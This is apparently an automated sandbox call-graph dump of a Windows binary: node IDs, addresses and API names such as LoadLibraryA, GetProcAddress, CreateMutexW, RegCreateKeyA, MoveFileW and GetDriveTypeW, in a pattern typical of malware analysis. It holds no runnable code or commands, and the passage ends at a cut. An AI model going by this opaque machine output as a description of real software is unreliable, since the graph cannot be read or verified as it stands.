14334->14333 14338 32efb43 14335->14338 14337 32efb89 14337->14195 14338->14337 14350 32efb90 14338->14350 14339->14318 14341 32e751a 14340->14341 14342 32e1080 2 API calls 14341->14342 14343 32e7527 lstrcpynA 14342->14343 14344 32e7545 14343->14344 14345 32e8d2e 2 API calls 14344->14345 14346 32e754f 14345->14346 14347 32e8f0a memset 14346->14347 14348 32e7574 14347->14348 14348->14322 14349->14332 14355 32ef823 memset memset 14350->14355 14352 32efbdf 14352->14338 14353 32efbbc 14353->14352 14381 32ef621 14353->14381 14356 32e9f75 2 API calls 14355->14356 14357 32ef877 14356->14357 14358 32e9f75 2 API calls 14357->14358 14359 32ef884 14358->14359 14360 32e9f75 2 API calls 14359->14360 14361 32ef891 14360->14361 14362 32e9f75 2 API calls 14361->14362 14363 32ef89e 14362->14363 14364 32e9f75 2 API calls 14363->14364 14365 32ef8a9 14364->14365 14366 32e8f0a memset 14365->14366 14379 32ef8bd 14366->14379 14367 32ef93a GetLastError 14367->14379 14368 32efa8d 14369 32e8f0a memset 14368->14369 14374 32ef907 14368->14374 14370 32efaaf 14369->14370 14373 32efacb GetLastError 14370->14373 14370->14374 14371 32ea202 GetSystemTimeAsFileTime 14371->14379 14372 32ef97b GetLastError 14372->14379 14373->14374 14374->14353 14375 32ef9d3 GetLastError 14375->14379 14377 32e9f75 2 API calls 14377->14379 14378 32e8d2e 2 API calls 14378->14379 14379->14367 14379->14368 14379->14371 14379->14372 14379->14374 14379->14375 14379->14377 14379->14378 14380 32efa4d GetLastError 14379->14380 14397 32ef769 14379->14397 14380->14379 14382 32ef63e 14381->14382 14401 32e8d70 RtlAllocateHeap 14382->14401 14384 32ef653 14385 32ef65c 14384->14385 14402 32e8d70 RtlAllocateHeap 14384->14402 14387 32ef72f 14385->14387 14388 32e8d86 2 API calls 14385->14388 14389 32ef747 14387->14389 14390 32e8d86 2 API calls 14387->14390 14388->14387 14389->14352 14390->14389 14391 32ef709 GetLastError 14391->14385 14392 32ef715 14391->14392 14393 32ea202 GetSystemTimeAsFileTime 14392->14393 14393->14385 14394 32ea202 GetSystemTimeAsFileTime 14395 32ef66c 14394->14395 14395->14385 14395->14387 14395->14391 14395->14394 14396 32e8e04 3 API calls 14395->14396 14396->14395 14398 32ef78b 14397->14398 14399 32ef7b0 GetLastError 14398->14399 14400 32ef7ab 14398->14400 14399->14400 14400->14379 14401->14384 14402->14395 14404 32f1d91 14403->14404 14405 32f1d4b 14403->14405 14404->14219 14405->14404 14408 32f2489 14405->14408 14407 32f1d7e 14407->14219 14415 32f1e8c 14408->14415 14410 32f24a0 14413 32f24c7 14410->14413 14419 32f25fd 14410->14419 14412 32f24be 14412->14413 14414 32f1e8c 8 API calls 14412->14414 14413->14407 14414->14413 14416 32f1e9e 14415->14416 14418 32f1ed7 14416->14418 14429 32f202b 14416->14429 14418->14410 14420 32f265e 14419->14420 14421 32f2614 14419->14421 14420->14412 14421->14420 14422 32f2684 14421->14422 14423 32f2630 14421->14423 14455 32f2409 14422->14455 14425 32f2635 14423->14425 14426 32f2673 14423->14426 14425->14420 14428 32f2646 memchr 14425->14428 14445 32f24fa 14426->14445 14428->14420 14430 32f2045 14429->14430 14431 32f206a 14430->14431 14432 32f20ff 14430->14432 14434 32f20b4 14430->14434 14431->14418 14432->14431 14436 32f34b7 14432->14436 14435 32f20c4 _errno _strtoi64 _errno 14434->14435 14435->14431 14442 32f351b localeconv 14436->14442 14439 32f34ef 14440 32f34fe _errno 14439->14440 14441 32f350a 14439->14441 14440->14441 14441->14431 14443 32f352b strchr 14442->14443 14444 32f34c6 _errno strtod 14442->14444 14443->14444 14444->14439 14444->14440 14446 32f11d0 7 API calls 14445->14446 14447 32f2506 14446->14447 14448 32f1e8c 8 API calls 14447->14448 14454 32f2528 14447->14454 14452 32f251c 14448->14452 14449 32f2545 memchr 14449->14452 14449->14454 14450 32f25fd 17 API calls 14450->14452 14451 32f12f6 strncpy 14451->14452 14452->14449 14452->14450 14452->14451 14453 32f1e8c 8 API calls 14452->14453 14452->14454 14453->14452 14454->14420 14456 32f2412 14455->14456 14457 32f1e8c 8 API calls 14456->14457 14458 32f242d 14456->14458 14460 32f2425 14457->14460 14458->14420 14459 32f25fd 18 API calls 14459->14460 14460->14458 14460->14459 14461 32f1e8c 8 API calls 14460->14461 14461->14460 14463 32f055f GetTickCount 14462->14463 14464 32f054e __aulldiv 14462->14464 14463->14151 14464->14151 14466 32f11d0 7 API calls 14465->14466 14467 32e87f1 14466->14467 14468 32e88ce strncpy 14467->14468 14469 32e8807 14468->14469 14470 32e88ce strncpy 14469->14470 14471 32e881b 14470->14471 14472 32e88ce strncpy 14471->14472 14473 32e882c 14472->14473 14474 32e88ce strncpy 14473->14474 14475 32e883d 14474->14475 14476 32e88ce strncpy 14475->14476 14477 32e8852 14476->14477 14478 32e88ce strncpy 14477->14478 14479 32e8867 14478->14479 14480 32e88ce strncpy 14479->14480 14481 32e887d 14480->14481 14482 32f1c51 13 API calls 14481->14482 14483 32e8885 14482->14483 14483->14158 11196 32e623d 11215 32f3789 11196->11215 11200 32e6258 11221 32e972e 11200->11221 11202 32e625d 11224 32e64c2 11202->11224 11214 32e62ae 11216 32f37a1 GetModuleHandleA 11215->11216 11219 32e6253 11215->11219 11217 32f37bc 11216->11217 11218 32f3835 LoadLibraryA 11217->11218 11217->11219 11218->11217 11218->11219 11220 32e8d5b HeapCreate 11219->11220 11220->11200 11291 32e8d70 RtlAllocateHeap 11221->11291 11223 32e973a 11223->11202 11292 32ef159 11224->11292 11227 32ef159 8 API calls 11228 32e64ef 11227->11228 11229 32ef159 8 API calls 11228->11229 11230 32e6508 11229->11230 11231 32ef159 8 API calls 11230->11231 11232 32e6521 11231->11232 11233 32ef159 8 API calls 11232->11233 11234 32e653c 11233->11234 11235 32ef159 8 API calls 11234->11235 11236 32e6555 11235->11236 11237 32ef159 8 API calls 11236->11237 11238 32e656e 11237->11238 11239 32ef159 8 API calls 11238->11239 11240 32e6587 11239->11240 11241 32ef159 8 API calls 11240->11241 11242 32e6267 11241->11242 11243 32ede84 11242->11243 11244 32ede9b 11243->11244 11333 32eca1b 11244->11333 11246 32edea2 11247 32e8f0a memset 11246->11247 11248 32edef1 GetVersionExA GetCurrentProcessId 11247->11248 11340 32ef3e5 11248->11340 11250 32edf0e 11345 32ef420 11250->11345 11253 32eb6f4 11254 32eb70d 11253->11254 11367 32eb643 11254->11367 11257 32ec59c 11260 32ec5af 11257->11260 11258 32e6299 11261 32e8f0a 11258->11261 11259 32ec5c8 FindCloseChangeNotification 11259->11258 11260->11258 11260->11259 11262 32e62a6 11261->11262 11263 32e8f13 memset 11261->11263 11264 32e618e 11262->11264 11263->11262 11389 32ea7a5 11264->11389 11267 32e619d 11267->11214 11268 32e61b5 11405 32e5fc3 11268->11405 11274 32e6218 11440 32e607f 11274->11440 11275 32e61c9 11277 32e61ce 11275->11277 11278 32e6221 11275->11278 11279 32e6239 11277->11279 11284 32eb6f4 7 API calls 11277->11284 11281 32e6216 11278->11281 11453 32f0ae8 11278->11453 11279->11214 11474 32e6065 11281->11474 11285 32e61ee 11284->11285 11286 32ec59c FindCloseChangeNotification 11285->11286 11287 32e61f6 11286->11287 11417 32e5c32 11287->11417 11291->11223 11302 32e9f75 11292->11302 11295 32ef17b GetModuleHandleA 11297 32ef18a 11295->11297 11296 32ef183 LoadLibraryA 11296->11297 11298 32ef198 11297->11298 11305 32ef10e 11297->11305 11310 32e8d2e 11298->11310 11314 32e8b74 11302->11314 11321 32e8d70 RtlAllocateHeap 11305->11321 11307 32ef14f 11307->11298 11308 32ef120 11308->11307 11322 32eefb8 11308->11322 11311 32e8d36 11310->11311 11312 32e64d6 11310->11312 11328 32e8d86 11311->11328 11312->11227 11315 32e8bac 11314->11315 11317 32e8b8b 11314->11317 11316 32e8bf3 lstrlenW 11315->11316 11318 32e8bff 11315->11318 11316->11318 11317->11315 11320 32e8d70 RtlAllocateHeap 11317->11320 11318->11295 11318->11296 11320->11315 11321->11308 11323 32ef02c 11322->11323 11324 32eefd1 11322->11324 11323->11308 11324->11323 11325 32ef084 LoadLibraryA 11324->11325 11325->11323 11326 32ef092 GetProcAddress 11325->11326 11326->11323 11327 32ef09e 11326->11327 11327->11323 11329 32e8dd2 11328->11329 11330 32e8d90 11328->11330 11329->11312 11330->11329 11331 32e8f0a memset 11330->11331 11332 32e8dc0 RtlFreeHeap 11331->11332 11332->11329 11334 32eca32 11333->11334 11335 32eca36 11334->11335 11349 32eca04 11334->11349 11335->11246 11338 32eca5b FindCloseChangeNotification 11339 32eca47 11338->11339 11339->11246 11341 32ef3fc 11340->11341 11342 32ef41c 11341->11342 11362 32e9a5a 11341->11362 11342->11250 11344 32ef409 11344->11250 11346 32ef43f 11345->11346 11347 32e9a5a RtlAllocateHeap 11346->11347 11348 32e626c 11346->11348 11347->11348 11348->11253 11352 32ec997 GetTokenInformation 11349->11352 11353 32ec9b9 GetLastError 11352->11353 11360 32ec9d6 11352->11360 11354 32ec9c4 11353->11354 11353->11360 11361 32e8d70 RtlAllocateHeap 11354->11361 11356 32ec9cc 11357 32ec9da GetTokenInformation 11356->11357 11356->11360 11358 32ec9ef 11357->11358 11357->11360 11359 32e8d86 2 API calls 11358->11359 11359->11360 11360->11338 11360->11339 11361->11356 11363 32e9a63 11362->11363 11365 32e9a75 11362->11365 11366 32e8d70 RtlAllocateHeap 11363->11366 11365->11344 11366->11365 11376 32f3598 11367->11376 11369 32eb65b 11370 32e9f75 2 API calls 11369->11370 11371 32eb685 11370->11371 11380 32e9faf 11371->11380 11373 32eb6e3 11374 32e8d2e 2 API calls 11373->11374 11375 32e6291 11374->11375 11375->11257 11377 32f35c2 11376->11377 11378 32f35a3 11376->11378 11377->11369 11378->11377 11384 32f36f2 11378->11384 11381 32e8f0a memset 11380->11381 11382 32e9fc3 _vsnprintf 11381->11382 11383 32e9fdd 11382->11383 11383->11373 11385 32f3702 11384->11385 11386 32f3735 lstrlenW 11385->11386 11387 32f3752 _ftol2_sse 11386->11387 11387->11378 11478 32ea7d0 11389->11478 11392 32f0cf6 11566 32e8d70 RtlAllocateHeap 11392->11566 11394 32f0cfd 11395 32f0d07 11394->11395 11567 32eb564 11394->11567 11395->11268 11398 32f0d4b 11398->11268 11403 32f0ae8 15 API calls 11404 32f0d48 11403->11404 11404->11268 11627 32eab8d 11405->11627 11408 32e62bf 11409 32eb6f4 7 API calls 11408->11409 11410 32e62dc 11409->11410 11411 32e5c32 10 API calls 11410->11411 11416 32e61bf 11410->11416 11412 32e6316 11411->11412 11412->11416 11662 32eab73 11412->11662 11415 32e6328 lstrcmpiW 11415->11416 11416->11274 11416->11275 11418 32eb6f4 7 API calls 11417->11418 11419 32e5c4b 11418->11419 11420 32e5c58 11419->11420 11421 32e9ba4 2 API calls 11419->11421 11422 32e5c7b 11421->11422 11666 32eb281 11422->11666 11424 32e5c8b 11425 32e5caf 11424->11425 11428 32eb281 2 API calls 11424->11428 11426 32e8d86 2 API calls 11425->11426 11427 32e5cbb 11426->11427 11429 32e6132 11427->11429 11428->11425 11430 32eab73 4 API calls 11429->11430 11431 32e613c 11430->11431 11432 32e614a lstrcmpiW 11431->11432 11433 32e6145 11431->11433 11434 32e617c 11432->11434 11435 32e6160 11432->11435 11433->11281 11437 32e8d86 2 API calls 11434->11437 11671 32eac6b 11435->11671 11437->11433 11726 32e8d70 RtlAllocateHeap 11440->11726 11442 32e6091 11443 32e60a4 GetDriveTypeW 11442->11443 11444 32e60d5 11442->11444 11443->11444 11727 32e2bc2 11444->11727 11446 32e60f1 11447 32e610f 11446->11447 11742 32e52be 11446->11742 11795 32eb173 11447->11795 11451 32eb173 2 API calls 11452 32e612b 11451->11452 11452->11278 11452->11279 11454 32e109a 2 API calls 11453->11454 11455 32f0af7 11454->11455 12386 32e677f memset 11455->12386 11458 32e8d41 2 API calls 11459 32f0b1d 11458->11459 11462 32f0b96 11459->11462 12398 32eab09 11459->12398 11462->11281 11464 32f0b48 11464->11462 11465 32e109a 2 API calls 11464->11465 11466 32f0b5a 11465->11466 11467 32e9fee 2 API calls 11466->11467 11468 32f0b69 11467->11468 11469 32eb798 2 API calls 11468->11469 11470 32f0b7c 11469->11470 11471 32f0b8a 11470->11471 12402 32eaf71 11470->12402 11472 32e8d86 2 API calls 11471->11472 11472->11462 11475 32e6077 11474->11475 12415 32e599a 11475->12415 11521 32e8d70 RtlAllocateHeap 11478->11521 11480 32ea7fa 11481 32e6199 11480->11481 11522 32ec5d7 11480->11522 11481->11267 11481->11268 11481->11392 11484 32e9f75 2 API calls 11485 32ea83a 11484->11485 11486 32ea978 11485->11486 11490 32ea866 11485->11490 11487 32ea98a 11486->11487 11488 32ea9c9 11486->11488 11492 32e9ba4 2 API calls 11487->11492 11516 32ea974 11487->11516 11489 32e9ba4 2 API calls 11488->11489 11489->11516 11490->11516 11532 32e9ba4 11490->11532 11491 32e8d2e 2 API calls 11493 32ea9e9 RegOpenKeyExA 11491->11493 11492->11516 11494 32eaa1a RegCloseKey 11493->11494 11495 32eaa03 RegCreateKeyA 11493->11495 11497 32eaa71 11494->11497 11505 32eaa44 11494->11505 11495->11494 11495->11497 11498 32e8d86 2 API calls 11497->11498 11500 32eaa7f 11498->11500 11501 32e8f0a memset 11500->11501 11501->11505 11502 32ea92e 11509 32e9ba4 2 API calls 11502->11509 11505->11505 11506 32e8d86 2 API calls 11505->11506 11506->11481 11510 32ea955 11509->11510 11515 32e8d86 2 API calls 11510->11515 11515->11516 11516->11491 11518 32e8d86 2 API calls 11519 32ea923 11518->11519 11520 32e8d86 2 API calls 11519->11520 11520->11502 11521->11480 11523 32ec5f0 11522->11523 11524 32f36f2 2 API calls 11523->11524 11525 32ec600 11524->11525 11526 32e9f75 2 API calls 11525->11526 11527 32ec60f 11526->11527 11528 32ec64b 11527->11528 11530 32f36f2 2 API calls 11527->11530 11529 32e8d2e 2 API calls 11528->11529 11531 32ea81b 11529->11531 11530->11527 11531->11484 11534 32e9bb6 11532->11534 11557 32e8d70 RtlAllocateHeap 11534->11557 11535 32e9bd3 11536 32e9bf0 11535->11536 11537 32e9bdf lstrcatA 11535->11537 11536->11497 11536->11502 11538 32e9f8f 11536->11538 11537->11535 11558 32e8c4a 11538->11558 11540 32e9faa 11541 32e9bf7 11540->11541 11542 32e9c09 11541->11542 11564 32e8d70 RtlAllocateHeap 11542->11564 11544 32e9c45 11547 32e8d41 11544->11547 11545 32e9c28 11545->11544 11546 32e9c34 lstrcatW 11545->11546 11546->11545 11548 32e8d4f 11547->11548 11549 32e8d57 11547->11549 11550 32e8d86 2 API calls 11548->11550 11551 32e9acd 11549->11551 11550->11549 11552 32e9ad6 11551->11552 11553 32e9b03 11551->11553 11565 32e8d70 RtlAllocateHeap 11552->11565 11553->11518 11555 32e9ae8 11555->11553 11556 32e9af0 MultiByteToWideChar 11555->11556 11556->11553 11557->11535 11559 32e8c6b lstrlenW 11558->11559 11563 32e8d70 RtlAllocateHeap 11559->11563 11562 32e8cf2 11562->11540 11562->11562 11563->11562 11564->11545 11565->11555 11566->11394 11568 32eb57c 11567->11568 11570 32eb575 11567->11570 11608 32eb49b CreateFileW 11568->11608 11570->11398 11580 32f0ba4 11570->11580 11571 32eb583 11571->11570 11572 32eb5e3 11571->11572 11609 32e8d70 RtlAllocateHeap 11571->11609 11572->11570 11575 32e8d86 2 API calls 11572->11575 11574 32eb5a6 11574->11572 11610 32eb509 11574->11610 11575->11570 11578 32eb5c9 FindCloseChangeNotification 11578->11570 11614 32e8d70 RtlAllocateHeap 11580->11614 11582 32f0cee 11604 32efc1c 11582->11604 11583 32f0bb7 11583->11582 11585 32f0ca3 11583->11585 11615 32e109a 11583->11615 11587 32f0cc8 Sleep 11585->11587 11588 32f0ce3 11585->11588 11618 32eb604 11585->11618 11587->11585 11587->11588 11590 32e8d86 2 API calls 11588->11590 11590->11582 11591 32e9f8f 2 API calls 11592 32f0c0e 11591->11592 11593 32e9bf7 2 API calls 11592->11593 11594 32f0c2c 11593->11594 11595 32eb564 6 API calls 11594->11595 11596 32f0c39 11595->11596 11597 32e8d41 2 API calls 11596->11597 11598 32f0c45 11597->11598 11599 32e8d41 2 API calls 11598->11599 11602 32f0c4e 11599->11602 11600 32e8d86 2 API calls 11601 32f0c98 11600->11601 11603 32e8d86 2 API calls 11601->11603 11602->11600 11603->11585 11605 32efc40 11604->11605 11623 32f04a2 11605->11623 11608->11571 11609->11574 11611 32eb541 ReadFile 11610->11611 11612 32eb524 11611->11612 11613 32eb551 11611->11613 11612->11611 11612->11613 11613->11572 11613->11578 11614->11583 11616 32e8c4a 2 API calls 11615->11616 11617 32e10b5 11616->11617 11617->11591 11621 32eb457 CreateFileW 11618->11621 11620 32eb613 11620->11585 11622 32eb47c 11621->11622 11622->11620 11624 32f04bb 11623->11624 11625 32f04dc lstrlenW 11624->11625 11626 32efc52 11625->11626 11626->11403 11630 32eab9d 11627->11630 11635 32eacbd 11630->11635 11633 32e5fd5 11633->11408 11634 32e8d86 2 API calls 11634->11633 11636 32eacdf 11635->11636 11649 32ea770 11636->11649 11638 32eabb6 11638->11633 11638->11634 11639 32eace9 11639->11638 11652 32ecec9 11639->11652 11641 32e8d86 2 API calls 11641->11638 11642 32ead1d 11643 32f04a2 lstrlenW 11642->11643 11646 32eadb6 11642->11646 11645 32ead6e 11643->11645 11644 32e8d86 2 API calls 11644->11646 11648 32ead91 11645->11648 11656 32e8dd5 11645->11656 11646->11641 11648->11644 11659 32e8d70 RtlAllocateHeap 11649->11659 11651 32ea77c 11651->11639 11653 32eceef 11652->11653 11655 32ecef3 11653->11655 11660 32e8d70 RtlAllocateHeap 11653->11660 11655->11642 11661 32e8d70 RtlAllocateHeap 11656->11661 11658 32e8de6 11658->11648 11659->11651 11660->11655 11661->11658 11663 32eab78 11662->11663 11664 32eacbd 4 API calls 11663->11664 11665 32e6324 11664->11665 11665->11415 11665->11416 11667 32eb290 11666->11667 11670 32eb28b 11666->11670 11668 32eb2a7 GetLastError 11667->11668 11669 32eb2b2 GetLastError 11667->11669 11668->11670 11669->11670 11670->11424 11689 32eac79 11671->11689 11674 32ec413 SetFileAttributesW 11675 32e8f0a memset 11674->11675 11676 32ec440 11675->11676 11677 32eb604 CreateFileW 11676->11677 11678 32ec44e 11677->11678 11679 32ec461 11678->11679 11680 32f36f2 2 API calls 11678->11680 11679->11434 11681 32ec47d 11680->11681 11710 32e9fee 11681->11710 11684 32e9bf7 2 API calls 11685 32ec49f 11684->11685 11685->11679 11714 32ec340 11685->11714 11688 32e8d86 2 API calls 11688->11679 11690 32eac89 11689->11690 11693 32eade8 11690->11693 11694 32e6171 11693->11694 11695 32eae05 11693->11695 11694->11434 11694->11674 11695->11694 11696 32f36f2 2 API calls 11695->11696 11697 32eae49 11696->11697 11709 32e8d70 RtlAllocateHeap 11697->11709 11699 32eae5d 11699->11694 11700 32f3598 2 API calls 11699->11700 11701 32eae9f 11700->11701 11702 32f04a2 lstrlenW 11701->11702 11703 32eaee0 11702->11703 11704 32ea770 RtlAllocateHeap 11703->11704 11707 32eaeec 11704->11707 11705 32eaf56 11706 32e8d86 2 API calls 11705->11706 11706->11694 11707->11705 11708 32e8d86 2 API calls 11707->11708 11708->11705 11709->11699 11711 32e8f0a memset 11710->11711 11712 32ea002 _vsnwprintf 11711->11712 11713 32ea01f 11712->11713 11713->11684 11715 32ec363 11714->11715 11716 32ec36b memset 11715->11716 11725 32ec3da 11715->11725 11717 32e9f8f 2 API calls 11716->11717 11718 32ec387 11717->11718 11719 32f36f2 2 API calls 11718->11719 11720 32ec3a3 11719->11720 11721 32e9fee 2 API calls 11720->11721 11722 32ec3b9 11721->11722 11723 32e8d41 2 API calls 11722->11723 11724 32ec3c2 MoveFileW 11723->11724 11724->11725 11725->11688 11726->11442 11803 32e1080 11727->11803 11732 32e8d2e 2 API calls 11733 32e2bfe 11732->11733 11734 32e2c31 11733->11734 11735 32e1080 2 API calls 11733->11735 11734->11446 11736 32e2c0c 11735->11736 11815 32eb139 11736->11815 11739 32e8d2e 2 API calls 11740 32e2c25 11739->11740 11741 32e8d86 2 API calls 11740->11741 11741->11734 11925 32ef247 11742->11925 11745 32e5528 11745->11447 11748 32eb6f4 7 API calls 11749 32e52ef 11748->11749 11941 32eb233 11749->11941 11751 32e52fb 11751->11745 11752 32ef159 8 API calls 11751->11752 11753 32e531a 11752->11753 11754 32e9f8f 2 API calls 11753->11754 11755 32e532b 11754->11755 11756 32e9bf7 2 API calls 11755->11756 11757 32e5344 11756->11757 11758 32e8d41 2 API calls 11757->11758 11760 32e5357 11758->11760 11759 32e536a 11761 32e8d86 2 API calls 11759->11761 11760->11759 11946 32eb156 11760->11946 11763 32e537f 11761->11763 11952 32e4fe8 memset 11763->11952 11799 32eb182 11795->11799 11802 32e6123 11795->11802 11796 32eb1a7 11798 32e8d86 2 API calls 11796->11798 11797 32e8d86 2 API calls 11797->11799 11800 32eb1b2 11798->11800 11799->11796 11799->11797 11801 32e8d86 2 API calls 11800->11801 11801->11802 11802->11451 11804 32e8b74 2 API calls 11803->11804 11805 32e1096 11804->11805 11806 32eb341 11805->11806 11807 32e9acd 2 API calls 11806->11807 11809 32eb361 11807->11809 11808 32f36f2 2 API calls 11808->11809 11809->11808 11810 32eb3ae 11809->11810 11811 32e8d86 2 API calls 11810->11811 11812 32eb3b9 11811->11812 11813 32e8dd5 RtlAllocateHeap 11812->11813 11814 32e2bee 11812->11814 11813->11814 11814->11732 11820 32e90cb 11815->11820 11818 32e2c1a 11818->11739 11821 32e90da 11820->11821 11822 32e9116 11820->11822 11838 32e8d70 RtlAllocateHeap 11821->11838 11822->11818 11828 32eb07e 11822->11828 11824 32e90e4 11824->11822 11839 32e8fd0 11824->11839 11827 32e8d86 2 API calls 11827->11822 11882 32e924b 11828->11882 11832 32eb132 11832->11818 11833 32eb12a 11892 32e947b 11833->11892 11835 32eb098 11835->11832 11835->11833 11836 32e8e04 3 API calls 11835->11836 11888 32e9a1d 11835->11888 11836->11835 11838->11824 11853 32e8d70 RtlAllocateHeap 11839->11853 11841 32e8fe5 11844 32e900d 11841->11844 11848 32e8ff2 11841->11848 11854 32e9521 11841->11854 11842 32e9091 11845 32e8d86 2 API calls 11842->11845 11842->11848 11844->11842 11846 32e905b 11844->11846 11847 32e9521 lstrlenW 11844->11847 11845->11848 11846->11842 11846->11848 11858 32efdb9 11846->11858 11847->11846 11848->11822 11848->11827 11851 32e90ab 11852 32e8d86 2 API calls 11851->11852 11852->11848 11853->11841 11855 32e9541 11854->11855 11856 32f04a2 lstrlenW 11855->11856 11857 32e9565 11856->11857 11857->11844 11873 32e8d70 RtlAllocateHeap 11858->11873 11860 32e8d86 2 API calls 11862 32eff72 11860->11862 11861 32efddd 11870 32eff4c 11861->11870 11874 32e8d70 RtlAllocateHeap 11861->11874 11865 32e8d86 2 API calls 11862->11865 11864 32efdfd 11864->11870 11875 32e8d70 RtlAllocateHeap 11864->11875 11866 32eff80 11865->11866 11868 32e8d86 2 API calls 11866->11868 11869 32e908a 11866->11869 11868->11869 11869->11842 11869->11851 11870->11860 11871 32efe11 11871->11870 11876 32e8e04 11871->11876 11873->11861 11874->11864 11875->11871 11881 32e8d70 RtlAllocateHeap 11876->11881 11878 32e8e19 11879 32e8d86 2 API calls 11878->11879 11880 32e8e41 11878->11880 11879->11880 11880->11871 11881->11878 11885 32e926e 11882->11885 11883 32e8d70 RtlAllocateHeap 11883->11885 11884 32e93a2 11887 32e8d70 RtlAllocateHeap 11884->11887 11885->11883 11885->11884 11886 32e8d86 2 API calls 11885->11886 11886->11885 11887->11835 11889 32e9a28 11888->11889 11891 32e9a3e 11888->11891 11904 32e8d70 RtlAllocateHeap 11889->11904 11891->11835 11893 32e948a 11892->11893 11903 32e9512 11892->11903 11894 32e94c4 11893->11894 11897 32e8d86 2 API calls 11893->11897 11893->11903 11895 32e94d4 11894->11895 11905 32e95a2 11894->11905 11898 32e8d86 2 API calls 11895->11898 11899 32e94ef 11895->11899 11897->11893 11898->11899 11900 32e9505 11899->11900 11901 32e8d86 2 API calls 11899->11901 11902 32e8d86 2 API calls 11900->11902 11901->11900 11902->11903 11903->11832 11904->11891 11919 32e8d70 RtlAllocateHeap 11905->11919 11907 32e95db 11908 32e960e 11907->11908 11910 32e968c 11907->11910 11918 32e95e5 11907->11918 11920 32e8f58 11908->11920 11911 32f04a2 lstrlenW 11910->11911 11915 32e9684 11911->11915 11912 32eb457 CreateFileW 11917 32e96ef 11912->11917 11913 32e961a 11914 32f04a2 lstrlenW 11913->11914 11914->11915 11915->11912 11916 32e8d86 2 API calls 11916->11918 11917->11916 11918->11895 11919->11907 11921 32f36f2 2 API calls 11920->11921 11924 32e8f71 11921->11924 11922 32e8f9e 11922->11913 11923 32f36f2 2 API calls 11923->11924 11924->11922 11924->11923 11926 32e52d1 11925->11926 11927 32ef25d 11925->11927 11926->11745 11938 32ec86b 11926->11938 11928 32e9f75 2 API calls 11927->11928 11929 32ef269 11928->11929 11930 32e9f75 2 API calls 11929->11930 11931 32ef278 11930->11931 11931->11926 11932 32ef285 GetModuleHandleA 11931->11932 11933 32ef299 11932->11933 11934 32ef292 GetModuleHandleA 11932->11934 11935 32e8d2e 2 API calls 11933->11935 11934->11933 11936 32ef2a4 11935->11936 11937 32e8d2e 2 API calls 11936->11937 11937->11926 12021 32ec789 11938->12021 11940 32e52e3 11940->11748 11942 32eb247 11941->11942 11943 32eb24d GetLastError 11942->11943 11944 32eb257 GetLastError 11942->11944 11945 32eb264 11943->11945 11944->11945 11945->11751 12036 32e912a 11946->12036 11948 32eb162 11949 32eb168 11948->11949 11950 32eb07e 7 API calls 11948->11950 11949->11759 11953 32e501e 11952->11953 11954 32e5053 11953->11954 12058 32e3034 11953->12058 11956 32ec86b 8 API calls 11954->11956 11966 32e50b8 11954->11966 12022 32e8f0a memset 12021->12022 12023 32ec7ab lstrcpynW 12022->12023 12025 32e9f8f 2 API calls 12023->12025 12026 32ec7e0 12025->12026 12027 32e8d41 2 API calls 12026->12027 12028 32ec815 12027->12028 12029 32e9fee 2 API calls 12028->12029 12030 32ec836 lstrcatW 12029->12030 12034 32ea5f3 12030->12034 12033 32ec85c 12033->11940 12035 32ea5fb CharUpperBuffW 12034->12035 12035->12033 12056 32e8d70 RtlAllocateHeap 12036->12056 12038 32e914b 12039 32e915c lstrcpynW 12038->12039 12046 32e9155 12038->12046 12040 32e91cf 12039->12040 12041 32e917f 12039->12041 12057 32e8d70 RtlAllocateHeap 12040->12057 12043 32eb564 6 API calls 12041->12043 12046->11948 12056->12038 12059 32e3050 12058->12059 12408 32e8d70 RtlAllocateHeap 12386->12408 12388 32e67ba 12389 32e692b 12388->12389 12409 32e8d70 RtlAllocateHeap 12388->12409 12389->11458 12391 32e683a 12392 32e8d86 2 API calls 12391->12392 12393 32e691d 12392->12393 12394 32e8d86 2 API calls 12393->12394 12394->12389 12395 32e8f0a memset 12396 32e67d4 12395->12396 12396->12389 12396->12391 12396->12395 12397 32ec413 12 API calls 12396->12397 12397->12396 12410 32eab18 12398->12410 12401 32e8d70 RtlAllocateHeap 12401->11464 12403 32eaf7d 12402->12403 12404 32ea770 RtlAllocateHeap 12403->12404 12406 32eafa5 12404->12406 12405 32eb00a 12405->11471 12406->12405 12407 32e8d86 2 API calls 12406->12407 12407->12405 12408->12388 12409->12396 12411 32eacbd 4 API calls 12410->12411 12412 32eab37 12411->12412 12413 32e8d86 2 API calls 12412->12413 12414 32eab15 12412->12414 12413->12414 12414->11462 12414->12401 12416 32eab09 4 API calls 12415->12416 12417 32e59ab 12416->12417 12450 32e5a0d 12417->12450 12451 32eb434 12417->12451 12420 32eac02 6 API calls 12421 32e59d1 12420->12421 12456 32ef5b7 12421->12456 12424 32eb6f4 7 API calls 12425 32e59ef 12424->12425 12425->12450 12463 32ea2a5 12425->12463 12429 32e5a25 12481 32e1486 CreateMutexW 12429->12481 12431 32e5a2a 12432 32ea3a2 6 API calls 12431->12432 12433 32e5a38 12432->12433 12496 32e34a0 12433->12496 12450->11279 12452 32ea202 GetSystemTimeAsFileTime 12451->12452 12453 32eb43f 12452->12453 12454 32eabd3 6 API calls 12453->12454 12455 32e59bf 12454->12455 12455->12420 12457 32ef159 8 API calls 12456->12457 12458 32ef5c9 12457->12458 12459 32ef159 8 API calls 12458->12459 12460 32ef5e2 12459->12460 12560 32ef546 12460->12560 12462 32e59d8 12462->12424 12464 32ea2b6 12463->12464 12466 32e5a17 12464->12466 12574 32e8d70 RtlAllocateHeap 12464->12574 12467 32ea3a2 12466->12467 12468 32ea3c0 12467->12468 12470 32ea418 12468->12470 12475 32ea3c4 12468->12475 12575 32ea2f8 12468->12575 12469 32ea429 12472 32eb233 2 API calls 12469->12472 12469->12475 12470->12469 12581 32e8d70 RtlAllocateHeap 12470->12581 12474 32ea48e 12472->12474 12476 32ea4c9 12474->12476 12477 32ea504 SetThreadPriority 12474->12477 12475->12429 12478 32ea4ed 12476->12478 12479 32e8d86 2 API calls 12476->12479 12477->12475 12480 32e8f0a memset 12478->12480 12479->12478 12480->12475 12482 32e149f CreateMutexW 12481->12482 12492 32e14ec 12481->12492 12483 32e14b1 12482->12483 12482->12492 12484 32e1080 2 API calls 12483->12484 12485 32e14bb 12484->12485 12486 32e9a1d RtlAllocateHeap 12485->12486 12485->12492 12487 32e14cb 12486->12487 12488 32e8d2e 2 API calls 12487->12488 12489 32e14d8 12488->12489 12582 32e8d70 RtlAllocateHeap 12489->12582 12491 32e14e2 12491->12492 12583 32e8d70 RtlAllocateHeap 12491->12583 12492->12431 12494 32e1503 12494->12492 12584 32e747f 12494->12584 12497 32e34ae 12496->12497 12499 32e34b3 12496->12499 12588 